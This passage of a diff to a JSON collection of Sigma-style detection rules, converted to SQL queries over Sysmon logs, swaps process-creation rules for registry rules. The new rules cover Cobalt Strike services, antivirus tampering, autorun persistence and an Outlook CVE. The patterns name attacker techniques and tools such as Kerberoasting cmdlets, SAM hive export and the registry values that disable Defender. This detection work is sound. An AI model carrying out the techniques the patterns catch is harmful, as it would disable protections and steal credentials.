'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_export_keys.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Stop Windows Service Via PowerShell Stop-Service", - "id": "c49c5062-0966-4170-9efd-9968c913a6cf", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_stop_service.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1562.001" ], + "falsepositives": [ + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1070.005" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook Task/Note Reminder Received", + "id": "fc06e655-d98c-412f-ac76-05c2698b1cb2", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Legitimate reminders received for a task or a note will also trigger this rule." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Tasks\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Notes\\\\%' ESCAPE '\\') AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", - "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP 